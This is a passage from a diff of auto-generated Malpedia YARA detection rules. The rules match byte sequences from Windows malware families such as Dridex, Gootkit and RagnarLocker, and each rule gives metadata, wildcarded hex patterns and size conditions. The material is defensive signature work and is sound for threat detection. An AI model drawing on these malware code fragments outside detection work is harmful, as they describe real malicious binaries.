+		$sequence_3 = { 89c2 ebe0 0f86dc000000 8d7101 }
+		$sequence_4 = { 5f 5d c3 55 89e5 83ec28 8b4514 }
+		$sequence_5 = { 8d4101 c74424080a000000 890424 c745e400000000 e8???????? 89c6 }
+		$sequence_6 = { 894314 8b4510 897b04 c7430800000000 c7431000000000 }
+		$sequence_7 = { 010c37 ff45d0 ebcb 01fa ebb4 8b7dd0 }
+		$sequence_8 = { e8???????? 895c2408 c744240400000000 890424 e8???????? 83ec0c }
+		$sequence_9 = { 83ec10 85c0 8945d4 7542 8b45d0 c744240c04000000 c744240800300000 }
 
 	condition:
-		7 of them and filesize < 2367488
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Gootkit_Auto : FILE
+rule MALPEDIA_Win_Mayberobot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc674f83-d3cc-5cc6-8f48-f7ded72789f2"
+		id = "c92428ca-450d-55ec-a6b0-19554a59efc9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gootkit_auto.yar#L1-L334"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mayberobot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mayberobot_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "e886088177ff2cbe60c39328c9402db705beff1123d5a11d85e3c6ea020086bf"
+		logic_hash = "7a87fd7bc03b1a4ed615fd0a81f85d5bd0e66326980b2da4e2257c81318fa9fe"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -147660,59 +147486,32 @@ rule MALPEDIA_Win_Gootkit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41 3bca 72f2 56 6a00 ff15???????? }
-		$sequence_1 = { 3bca 72f2 335df0 6a10 58 }
-		$sequence_2 = { 33c0 85c9 0f444508 5d c20400 }
-		$sequence_3 = { 50 56 ff15???????? 56 ffd7 8bd0 33ff }
-		$sequence_4 = { 59 85c0 740c 8b30 33ff 0375dc }
-		$sequence_5 = { 8b840888000000 eb04 8b440878 03c1 c3 }
-		$sequence_6 = { e8???????? 8b5dfc ff75f4 6a00 ff15???????? }
-		$sequence_7 = { 894df4 50 ff75fc ffd7 85c0 744b }
-		$sequence_8 = { f3aa 68???????? ff15???????? 50 }
-		$sequence_9 = { 8b7df4 32c0 8b4de4 f3aa }
-		$sequence_10 = { 50 68???????? ff15???????? 85c0 7505 e8???????? }
-		$sequence_11 = { 50 e8???????? 83c40c 68fd000000 }
-		$sequence_12 = { 50 8b4508 8b00 99 }
-		$sequence_13 = { c705????????01000000 c705????????02000000 8be5 5d }
-		$sequence_14 = { 833d????????00 750a 6a32 ff15???????? }
-		$sequence_15 = { e8???????? 6a0c 6a08 ff15???????? 50 ff15???????? }
-		$sequence_16 = { 6808020000 6a00 ff15???????? 50 }
-		$sequence_17 = { 6a02 ff15???????? 6888130000 ff15???????? }
-		$sequence_18 = { e8???????? 8d45fc 50 6a01 6a01 6a00 6800000002 }
-		$sequence_19 = { e8???????? 85c0 750c c705????????03000000 }
-		$sequence_20 = { 8b4508 8b00 99 52 50 6a00 }
-		$sequence_21 = { 53 53 53 8901 }
-		$sequence_22 = { 0f114f20 0f104840 0f114730 0f104050 0f114f40 0f104860 0f114750 }
-		$sequence_23 = { 754c 8b5e02 8d45e4 6a1c 50 }
-		$sequence_24 = { 03c1 3bd8 7323 8b33 }
-		$sequence_25 = { 85c0 56 0f45ca 894dfc ff15???????? }
-		$sequence_26 = { 8b4c2434 ff15???????? 0fb74c2432 ff15???????? }
-		$sequence_27 = { 0f104010 0f110f 0f104820 0f114710 0f104030 0f114f20 0f104840 }
-		$sequence_28 = { 8b4070 894770 be01000000 ff15???????? }
-		$sequence_29 = { 0f104060 0f114760 8b4070 894770 }
-		$sequence_30 = { 7510 8d4864 ff15???????? ffc3 83fb0a }
-		$sequence_31 = { c602e9 2bc8 894a01 83c205 8b4610 33c9 }
-		$sequence_32 = { 0f104860 0f114750 0f114f60 b801000000 }
-		$sequence_33 = { 8b4de8 b84d5a0000 663901 754e 8b513c 03d1 813a50450000 }
-		$sequence_34 = { ffc3 83fb0a 7cd5 33c0 }
-		$sequence_35 = { ffd3 8b8de4fdffff 8b36 85f6 75a2 8b3f 85ff }
-		$sequence_36 = { 8b7df4 85ff 7414 57 8bce e8???????? }
+		$sequence_0 = { 4883ec28 803d????????00 754c 488d0da8270100 }
+		$sequence_1 = { 45390a 7449 496312 4803d5 0fb60a 83e10f 4a0fbe843110440100 }
+		$sequence_2 = { 4885c0 7509 488d05233a0100 eb04 }
+		$sequence_3 = { 90 8bdf 8b05???????? 48895c2420 3bf0 7c36 4c8d3da9080100 }
+		$sequence_4 = { 4c8d058afb0000 488b4318 4839b838010000 750f 498b04d0 42387ce839 0f84d3000000 }
+		$sequence_5 = { 488d0d8a0b0100 e8???????? 4883c428 c3 }
+		$sequence_6 = { e8???????? 85c0 7420 4c8b442430 }
+		$sequence_7 = { 488d151fc50000 b903000000 4c8d050bc50000 e8???????? 488bd3 }
+		$sequence_8 = { 4183f90f 7779 428b8c8e78f80000 4803ce ffe1 660f73fa01 eb65 }
+		$sequence_9 = { 488bd1 488bc1 48c1f806 4c8d05b4060100 }
 
 	condition:
-		7 of them and filesize < 516096
+		7 of them and filesize < 307200
 }
-rule MALPEDIA_Win_Quarterrig_Auto : FILE
+rule MALPEDIA_Win_Ragnarlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "773e603c-b2a3-5ce5-ad18-62d70b454a9c"
+		id = "115610a4-debf-5e53-866c-588d0e4a674d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quarterrig_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ragnarlocker_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "e5d3fc199bcc485e4ab028e477fcfeb78c0e1cd4e9776332bb130fba34692b6a"
+		logic_hash = "6d88f5a9935c94f31e5ef388da569a4f1a15523f9d92a2b5d9dd3611cf9ee236"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147726,34 +147525,34 @@ rule MALPEDIA_Win_Quarterrig_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d95f0010000 488d4c2460 e8???????? 410fbaec07 4489642434 488d542460 48837c247810 }
-		$sequence_1 = { 7506 443a5802 7420 498bc1 492bc2 4903c0 663b10 }
-		$sequence_2 = { 482bd7 4a0fbeb43850140600 8d4e01 4863c1 483bc2 0f8fe4010000 83f904 }
-		$sequence_3 = { 4c89442418 4c894c2420 4883ec28 b95772865c e8???????? 4c8bf8 b95772865c }
-		$sequence_4 = { 84c0 0f85a6000000 488d5770 488d8d10010000 e8???????? 84c0 0f8588000000 }
-		$sequence_5 = { 80e107 c0e103 498bc5 48d3e8 43300408 49ffc0 4983f803 }
-		$sequence_6 = { c3 488d0d7ad90500 e8???????? 833d????????ff 75d2 66c705????????1301 }
-		$sequence_7 = { 498d8fc0000000 498bd1 e8???????? 90 488b55d7 4883fa10 720c }
-		$sequence_8 = { 80e107 c0e103 48b8fff3a94f9f372b79 48d3e8 42300402 48ffc2 4883fa07 }
-		$sequence_9 = { 418ac9 80e107 c0e103 49b81bf1eb35955fe34f 49d3e8 45300401 49ffc1 }
+		$sequence_0 = { 8b7da4 0facd106 33fe c1ea06 33d9 8b4da8 33fa }
+		$sequence_1 = { c1e017 0bd8 8b45cc 0bf9 8b4dd4 33d2 }
+		$sequence_2 = { 33d0 03de 8b4dfc 8b75f8 8bc6 13fa c745bc00000000 }
+		$sequence_3 = { 8bf1 0facd113 c1e60d c1ea13 0bf2 895da8 8b957cffffff }
+		$sequence_4 = { 33db 0bd9 8975a4 8b8d50ffffff 8bfa 0fa4ca03 c1ef1d }
+		$sequence_5 = { 56 8b75f8 56 6a03 6a3b 57 ff15???????? }
+		$sequence_6 = { 8945e0 8b4594 8945e4 8b4590 8945e8 8b458c 8945c0 }
+		$sequence_7 = { 99 0bf2 c1e308 0bd8 0fb64143 0fa4de08 }
+		$sequence_8 = { 0bd8 0fb6410f 0fa4de08 8b4d98 99 0bf2 c1e308 }
+		$sequence_9 = { c1ea0e 3175fc 0bfa 8b75dc 33df 8b7de0 f7d6 }
 
 	condition:
-		7 of them and filesize < 971776
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Vigilant_Cleaner_Auto : FILE
+rule MALPEDIA_Win_Dridex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b2070620-d9f7-5811-b76d-80baf53d08b2"
+		id = "144cf75b-1d98-530d-8c7f-b36a158181d3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vigilant_cleaner_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dridex_auto.yar#L1-L1103"
 		license_url = "N/A"
-		logic_hash = "7e320a52ca8b714b97d83c5af01f55040082927d0e7ca8657f050cb83fb7182e"
+		logic_hash = "ed79935f1e181816ce095f2b34e8302b3ab4d9435988ec01dc1b779e29264775"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -147765,32 +147564,156 @@ rule MALPEDIA_Win_Vigilant_Cleaner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 b868584d56 bb00000000 b90a000000 ba58560000 ed 5b }
-		$sequence_1 = { ed 5b 59 5a }
-		$sequence_2 = { b90a000000 ba58560000 ed 5b 59 }
-		$sequence_3 = { b868584d56 bb00000000 b90a000000 ba58560000 ed 5b 59 }
-		$sequence_4 = { bb00000000 b90a000000 ba58560000 ed 5b }
-		$sequence_5 = { b90a000000 ba58560000 ed 5b 59 5a }
-		$sequence_6 = { ba58560000 ed 5b 59 }
-		$sequence_7 = { ba58560000 ed 5b 59 5a }
-		$sequence_8 = { b868584d56 bb00000000 b90a000000 ba58560000 ed 5b }
-		$sequence_9 = { bb00000000 b90a000000 ba58560000 ed 5b 59 }
+		$sequence_0 = { ffd6 85c0 7512 e8???????? eb03 }
+		$sequence_1 = { e8???????? b910270000 e8???????? e8???????? }
+		$sequence_2 = { c605????????01 c3 c605????????00 c3 }
+		$sequence_3 = { 83f8ff 7505 e8???????? 3d34270000 }
+		$sequence_4 = { ffd0 e8???????? 85c0 74de }
+		$sequence_5 = { ffd0 85c0 751f e8???????? }
+		$sequence_6 = { 740c b9e8030000 e8???????? b301 }
+		$sequence_7 = { 53 53 53 6a01 53 ffd0 }
+		$sequence_8 = { eb0a e8???????? eb03 6a7f }
+		$sequence_9 = { c3 31c0 c3 50 }
+		$sequence_10 = { e8???????? 85c0 7407 56 ffd0 }
+		$sequence_11 = { 807c241400 7409 8d4c2410 e8???????? }
+		$sequence_12 = { e8???????? 6880000000 53 53 }
+		$sequence_13 = { e8???????? 85c0 7408 6a00 ffd0 }
+		$sequence_14 = { 85c0 7407 685a040000 ffd0 }
+		$sequence_15 = { e8???????? 85c0 7404 6a7f }
+		$sequence_16 = { e8???????? 3db20d7897 7508 c70350000000 eb0d 3da665f63e 7506 }
+		$sequence_17 = { ffd0 5b c3 33c0 }
+		$sequence_18 = { e8???????? 6a00 8d4e1c e8???????? }
+		$sequence_19 = { e8???????? eb0a b9d0070000 e8???????? }
+		$sequence_20 = { e8???????? 6a29 8bc8 e8???????? }
+		$sequence_21 = { 7411 c7461003000000 e8???????? 894614 }
+		$sequence_22 = { e8???????? 8d4dc4 e8???????? 5e }
+		$sequence_23 = { 85c0 7415 6a01 6a00 6a00 }
+		$sequence_24 = { 8bc8 e8???????? 6a74 8bc8 e8???????? 6a70 }
+		$sequence_25 = { 6a70 8bc8 e8???????? 6a73 8bc8 e8???????? }
+		$sequence_26 = { eb08 83ca20 eb03 83ca10 }
+		$sequence_27 = { 6a00 8bcf e8???????? 50 ffd6 }
+		$sequence_28 = { e8???????? e9???????? 807c245000 740a }
+		$sequence_29 = { 46 e8???????? c1e802 3bf0 }
+		$sequence_30 = { 6a00 6a00 8d4dfc 51 6aff }
+		$sequence_31 = { 890424 894c2404 75dd 8b0424 }
+		$sequence_32 = { 89c1 8b442424 88c2 8854240f }
+		$sequence_33 = { 8b442428 6689c1 66894c2458 66894c245a }
+		$sequence_34 = { 6a64 59 e8???????? 33c9 }
+		$sequence_35 = { 33c0 803900 7411 ffc0 }
+		$sequence_36 = { c7461002000000 eb0f c7461003000000 e8???????? }
+		$sequence_37 = { 8a442427 a801 7534 eb00 31c0 }
+		$sequence_38 = { 7414 31c0 89c1 8b442424 }
+		$sequence_39 = { eb0a b988130000 e8???????? 33d2 }
+		$sequence_40 = { 85c0 7406 6a02 ff36 ffd0 }
+		$sequence_41 = { 6802100000 68ffff0000 ff36 ffd0 }
+		$sequence_42 = { eb00 8b442404 89c1 89ca }
+		$sequence_43 = { 8954242c 8b44242c 89c1 89ca }
+		$sequence_44 = { 89442408 7598 8a442407 a801 }
+		$sequence_45 = { c20400 55 8bec 83ec34 8365fc00 }
+		$sequence_46 = { 6a01 6a02 ffd0 8906 }
+		$sequence_47 = { ff7508 ffd0 85c0 750e }
+		$sequence_48 = { 51 6880000000 68ffff0000 ff36 }
+		$sequence_49 = { 50 56 8bcb e8???????? 50 e8???????? }
+		$sequence_50 = { 7404 33c9 ffd0 33c0 }
+		$sequence_51 = { e8???????? 84c0 740f 6a05 }
+		$sequence_52 = { e8???????? 6880000000 55 55 }
+		$sequence_53 = { c3 55 8bec 837d0800 7422 }
+		$sequence_54 = { ff7508 ffd0 33c0 40 5d }
+		$sequence_55 = { 8d4de0 51 68???????? ffd0 }
+		$sequence_56 = { 6a00 6a02 ffd0 50 }
+		$sequence_57 = { 6a73 e8???????? 833f00 7523 }
+		$sequence_58 = { e8???????? 8bc8 a1???????? ff30 }
+		$sequence_59 = { 7403 c60000 b840000000 83fa40 0f4ed0 }
+		$sequence_60 = { 890424 e8???????? 31c0 83c420 5e }
+		$sequence_61 = { e8???????? 50 ffd7 85c0 7512 }
+		$sequence_62 = { eb0c e8???????? 8bf0 eb03 }
+		$sequence_63 = { e8???????? 50 53 8d4dd0 e8???????? 50 }
+		$sequence_64 = { 8b45cc 31c9 8b55d0 39c2 }
+		$sequence_65 = { 8038e9 89c1 8945d0 894dcc }
+		$sequence_66 = { 8b4838 8b5034 891424 894c2404 e8???????? 8b44241c }
+		$sequence_67 = { 01ca 83c205 807c0805e9 891424 74e9 }
+		$sequence_68 = { 8b442408 8038e9 890424 7517 8b0424 8b4801 89c2 }
+		$sequence_69 = { 6681394d5a 8945b8 894dc4 0f85b6000000 }
+		$sequence_70 = { 8b45e8 05ffff0000 25ffff0000 83c001 }
+		$sequence_71 = { 83797c00 8b7dbc 8945b4 8955b0 8975ac }
+		$sequence_72 = { 31c9 8b54241c 8b723c 8b7e3c 89f3 01fb }
+		$sequence_73 = { 5e c3 53 57 56 83ec20 8b442430 }
+		$sequence_74 = { c3 55 89e5 68???????? e8???????? 83c404 }
+		$sequence_75 = { 894dc4 0f85a1000000 8b45b8 83c018 8b4db8 8b5178 }
+		$sequence_76 = { 890424 8944241c e8???????? 89442418 e8???????? 83f800 }
+		$sequence_77 = { 8b55bc 8955c4 776a 31c0 8b4dac 8b510c 8b75bc }
+		$sequence_78 = { 56 57 53 55 81ec88010000 8bd8 }
+		$sequence_79 = { 25ffff0000 83c001 8b4da8 01c1 }
+		$sequence_80 = { c3 55 89e5 57 56 53 83ec54 }
+		$sequence_81 = { 89c6 8945f8 894df4 8975f0 7418 8b45f4 05ffff0000 }
+		$sequence_82 = { 83c454 5b 5e 5f 5d c3 55 }
+		$sequence_83 = { 25ffff0000 83c001 8b4df0 01c1 894de4 }
+		$sequence_84 = { c7424800b00400 8b7de4 c787cc00000000000000 c787c800000000000000 }
+		$sequence_85 = { 5b 5e 5d c3 55 89e5 6a00 }
+		$sequence_86 = { 894df0 8b45f0 83c40c 5e 5d c3 }
+		$sequence_87 = { 8b4df8 01c1 894df0 8b45f0 }
+		$sequence_88 = { 890c24 c744240400000000 8945f0 8955ec e8???????? 8b483c 6689ce }
+		$sequence_89 = { 7418 8b45e4 05ffff0000 25ffff0000 }
+		$sequence_90 = { 89c7 8945f0 894dec 8955e8 897de4 }
+		$sequence_91 = { 8b4de8 81c1ffff0000 81e1ffff0000 83c101 }
+		$sequence_92 = { 53 57 83ec5c 8b450c }
+		$sequence_93 = { 894de0 7505 e9???????? 8b45e0 83c438 5f }
+		$sequence_94 = { 57 83ec38 8b450c 8b4d08 8945f0 }
+		$sequence_95 = { 5b 5d c3 8b45d0 8b4dd4 668b55d8 }
+		$sequence_96 = { e9???????? 8b45e0 83c45c 5f 5b 5e }
+		$sequence_97 = { 68???????? 50 50 ffd2 }
+		$sequence_98 = { 8945c4 894dc0 885dbf 8975b8 }
+		$sequence_99 = { 8945a0 8955cc 74bc 8b45cc 83c454 5b 5e }
+		$sequence_100 = { 89e5 57 53 56 83ec38 }
+		$sequence_101 = { 53 83ec74 8b450c 8b4d08 31d2 8b713c 89cf }
+		$sequence_102 = { 83c438 5e 5b 5f }
+		$sequence_103 = { eb06 83c414 5b 5d c3 8b45f0 8b0c8504406e00 }
+		$sequence_104 = { 57 83ec20 8b4508 890424 }
+		$sequence_105 = { 8b7dcc 39f8 8945c8 75e4 83c448 5e 5f }
+		$sequence_106 = { 85d2 7412 33c0 50 50 56 }
+		$sequence_107 = { c3 8b45f0 8b0c8504406e00 8b55f8 39d1 8945ec 894de8 }
+		$sequence_108 = { c605????????00 e8???????? 8bd0 85d2 7412 }
+		$sequence_109 = { 83ec20 a1???????? 85c0 7416 8b0d???????? e8???????? 84c0 }
+		$sequence_110 = { 0f85dafeffff 8b45e4 83c474 5b }
+		$sequence_111 = { 895c2414 660fd6442418 660fd6442420 e8???????? 84c0 }
+		$sequence_112 = { e9???????? 8bcd 8d8424a8010000 50 }
+		$sequence_113 = { 53 81ecb0000000 8b4508 8d4dd8 c745d800000000 }
+		$sequence_114 = { 8955dc e8???????? 8d0de8306e00 890424 894c2404 e8???????? 8d0d44306e00 }
+		$sequence_115 = { 8855af 8975cc 751c 8b45a4 8a4daf 31d2 8a2c0575306e00 }
+		$sequence_116 = { 83c470 5b 5f 5e 5d c3 }
+		$sequence_117 = { c3 55 89e5 56 53 57 83ec54 }
+		$sequence_118 = { e9???????? 8b45e0 83c45c 5e 5f 5b }
+		$sequence_119 = { 897dd8 8b45d8 83c444 5b 5e }
+		$sequence_120 = { 57 53 83ec70 8b450c }
+		$sequence_121 = { 74bc 8b45cc 83c454 5f 5b 5e 5d }
+		$sequence_122 = { 57 56 83ec5c 8b450c 8b4d08 31d2 8b7008 }
+		$sequence_123 = { 89e5 53 56 57 83ec38 }
+		$sequence_124 = { 8d0d44306e00 31d2 890c24 c744240400000000 }
+		$sequence_125 = { 89723c c7424004000000 c742442c0c0200 c7424800b00400 8b7de4 }
+		$sequence_126 = { 8a2c0575306e00 83c001 38e9 8945a0 }
+		$sequence_127 = { 57 83ec54 8d055a232700 31c9 8d55d8 803d????????e9 }
+		$sequence_128 = { 52 8bd6 e8???????? 8bcf 53 }
+		$sequence_129 = { 8945d0 74e4 31c0 8d0d5a238400 8b55c8 39ca }
+		$sequence_130 = { 8a4daf 31d2 8a2c0575308400 83c001 }
+		$sequence_131 = { c744240400000000 8955e0 e8???????? 8d0dd8308400 }
+		$sequence_132 = { 8b4d08 8d155e302f00 83ec04 891424 8945e8 }
+		$sequence_133 = { 8d0d44308400 31d2 8b75f8 89461c 890c24 c744240400000000 8955e4 }
 
 	condition:
-		7 of them and filesize < 1181696
+		7 of them and filesize < 1040384
 }
-rule MALPEDIA_Win_Kuluoz_Auto : FILE
+rule MALPEDIA_Win_Findpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e333e81d-6ddf-5afb-9076-c2e07a86e601"
+		id = "ce612255-6624-50a9-a03c-c60c58099af8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kuluoz_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.findpos_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "8a6d421ab9f7554479240c31c714fda22b910eb903ffdf797f53667a783e223f"
+		logic_hash = "5ddd8150bb7549b194e3af334d2fd54523af2954906df2786ddd0dce1684bb61"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147804,32 +147727,32 @@ rule MALPEDIA_Win_Kuluoz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4de8 83790c00 0f84e3000000 8b55e8 }
-		$sequence_1 = { 8bff 55 8bec 51 8b4508 8945fc 8b4d0c }
-		$sequence_2 = { 8b8da0fbffff 898df0fbffff 8b95a4fbffff 8995f4fbffff eb6f 8d85f8fbffff 50 }
-		$sequence_3 = { 85c0 740b 8b4df0 83c101 894df0 ebd7 8b55f0 }
-		$sequence_4 = { 8bff 55 8bec 51 56 c745fc00000000 eb09 }
-		$sequence_5 = { e8???????? 8b08 898d5cfbffff 8b5004 899560fbffff 8b4008 }
-		$sequence_6 = { 8b4508 054a050000 8b4d08 3b814a2d0000 7504 b001 eb02 }
-		$sequence_7 = { 50 e8???????? 8945f4 837df4ff 7405 8b45f4 eb4b }
-		$sequence_8 = { 0fbe5508 83fa0a 7409 0fbe4508 83f80d 7504 b001 }
-		$sequence_9 = { 8955f0 8b45f0 3b45e0 734e }
+		$sequence_0 = { 0fb6c0 50 0fb6c1 50 8d85e8e7ffff 50 }
+		$sequence_1 = { 42 8a1a 0fb63411 0fb6c3 83ce20 83c820 2bf0 }
+		$sequence_2 = { 3375f0 337df4 8b4008 8985dcfeffff }
+		$sequence_3 = { 8d4dd8 895dfc e8???????? 837dec10 8d55d8 0f4355d8 33c9 }
+		$sequence_4 = { 83791410 7202 8b09 33d2 e8???????? 85c0 7419 }
+		$sequence_5 = { 0f84d6000000 48 0f8497000000 83e804 7468 83e803 }
+		$sequence_6 = { bf3ce91fe0 0adb e3de a863 125f55 cae845 7d31 }
+		$sequence_7 = { e8???????? 6a00 6a01 8d8c2408010000 e9???????? 83fb27 0f871b010000 }
+		$sequence_8 = { 57 8b7d08 3b30 7554 394510 }
+		$sequence_9 = { ff15???????? 8bc8 890d???????? 85c9 743b 8b45f8 a3???????? }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Absentloader_Auto : FILE
+rule MALPEDIA_Win_Nemim_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6f362b30-2c49-5b13-a74d-e646b2c361d8"
+		id = "2fcca9e2-b8f3-5d83-84fc-b2e40aa4f4f9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.absentloader_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nemim_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "ec030f0c846e40821b8f0d08fe92e09a60380de99ecc678dae260a482a99d7bb"
+		logic_hash = "24d9011f0ff0bebf263a930abe315373fb7838840fe9989752df0056ff714df5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147843,32 +147766,32 @@ rule MALPEDIA_Win_Absentloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 50 8bce e8???????? 834dfcff 8d85f0f9ffff 50 }
-		$sequence_1 = { 8b08 8bc3 2bc1 c1f804 3bf0 7238 }
-		$sequence_2 = { 5e 8b448dd8 83e825 6bc033 99 f7fe }
-		$sequence_3 = { 6a7f 0f1145dc c745ec59000000 5f 6a32 58 2b448ddc }
-		$sequence_4 = { 48 a3???????? ff15???????? 8b0d???????? 89048db09506fd 5d c3 }
-		$sequence_5 = { 68087905fd 68007905fd 68087905fd 6a06 e8???????? 8bf0 }
-		$sequence_6 = { e8???????? 83ec18 c645fc07 8bcc 68a8f905fd 895910 c741140f000000 }
-		$sequence_7 = { 8b08 bfc8aa06fd 0f2805???????? a1???????? 0f1145dc c745ec0e5a410e }
-		$sequence_8 = { 40 83f80e 72f6 8bc1 c3 80791300 740c }
-		$sequence_9 = { 57 bf88a706fd 8d75e8 689f0705fd a5 a5 }
+		$sequence_0 = { 83c002 53 55 56 57 8d742410 bf10000000 }
+		$sequence_1 = { 52 6801000080 ff15???????? 8d442418 8d4c2454 50 8b442418 }
+		$sequence_2 = { 56 ff15???????? 8b442410 3d97010000 0f84ae000000 6800040000 }
+		$sequence_3 = { 888424e7000000 e8???????? 83c404 8d9424b4000000 68???????? 6819000200 6a00 }
+		$sequence_4 = { 8bd1 8dbc2450020000 c1e902 f3ab 8bca }
+		$sequence_5 = { 52 e8???????? 8d442458 50 e8???????? 8b15???????? 8d4c245c }
+		$sequence_6 = { 8b6c2440 8dbc3839d0d4d9 8bc7 c1e81c c1e704 0bc7 8bfe }
+		$sequence_7 = { 8bf0 750b c1e602 8b8628274300 eb09 c1e602 }
+		$sequence_8 = { 83fe10 7cde c605????????00 b90b000000 be???????? 8dbc2410010000 }
+		$sequence_9 = { 68e8030000 e8???????? 83c404 85f6 }
 
 	condition:
-		7 of them and filesize < 794624
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Mosaic_Regressor_Auto : FILE
+rule MALPEDIA_Win_Darkmoon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6545d5ce-704c-5c00-a6cd-ec1b5c909576"
+		id = "39d28dd7-0564-597d-bdac-de621314fd7d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosaic_regressor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mosaic_regressor_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkmoon_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "73c7fd14f8effd7ac9e0816b586de74eff8d0d21c8391e8e84f2921e57196fdb"
+		logic_hash = "b873ed88e28a76ea623543146de01af6abe20197674c7ea051692aae659c4969"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147882,34 +147805,34 @@ rule MALPEDIA_Win_Mosaic_Regressor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 670010 386700 1023 d18a0688078a }
-		$sequence_1 = { 8975e0 8db1d0a70010 8975e4 eb2a }
-		$sequence_2 = { 85c0 7456 8b4de0 8d0c8de0b70010 8901 8305????????20 }
-		$sequence_3 = { f3a4 6a1c 8d8c2480060000 51 6a00 ffd5 8d842478060000 }
-		$sequence_4 = { 8d442460 50 6a00 ffd5 8d442458 48 8d4900 }
-		$sequence_5 = { 895008 8d542458 52 88480c }
-		$sequence_6 = { c744241444000000 8bc8 90 8a10 }
-		$sequence_7 = { 6a06 89430c 8d4310 8d89c4a70010 5a }
-		$sequence_8 = { 8bff 55 8bec 8b4508 ff34c578a10010 ff15???????? 5d }
-		$sequence_9 = { 6a00 6a00 6a00 8d942498080000 }
+		$sequence_0 = { 898580f0ffff ff750c 680f0d0000 ffb580f0ffff 56 ff96d1000000 e8???????? }
+		$sequence_1 = { ff75f0 ff5675 83f800 766d 6a00 8d4df8 }
+		$sequence_2 = { 8d4f0c c645fc05 e8???????? 8d4f10 c645fc06 e8???????? }
